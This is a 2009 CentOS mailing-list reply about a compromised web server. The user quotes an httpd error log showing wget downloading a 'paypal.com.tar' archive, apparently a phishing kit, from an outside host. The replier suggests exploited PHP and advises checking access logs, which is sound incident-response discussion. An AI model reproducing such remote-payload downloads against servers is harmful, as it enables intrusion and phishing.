[CentOS] httpd - mysql - paypal.com.tar - hacker
John R Pierce
pierce at hogranch.comFri Aug 21 21:20:38 UTC 2009
- Previous message: [CentOS] httpd - mysql - paypal.com.tar - hacker
- Next message: [CentOS] httpd - mysql - paypal.com.tar - hacker
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Gregory P. Ennis wrote: > P.S. I found the following entry in my error_log of /var/log/httpd/ : > > [Sun Aug 16 04:26:19 2009] [info] Server built: Jul 14 2009 06:02:39 > --00:21:14-- http://code.go.ro/paypal.com.tar > Resolving code.go.ro... 81.196.20.134 > Connecting to code.go.ro|81.196.20.134|:80... connected. > HTTP request sent, awaiting response... 200 OK > Length: 645120 (630K) [application/x-tar] > Saving to: `paypal.com.tar' > .... looks like they spoofed something on your server, probably some kinda sloppy php, into running wget. I'd take a look at the access_log around the same timestamp to see if there any hints as to how they did this. http://xkcd.com/327/
- Previous message: [CentOS] httpd - mysql - paypal.com.tar - hacker
- Next message: [CentOS] httpd - mysql - paypal.com.tar - hacker
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
More information about the CentOS mailing list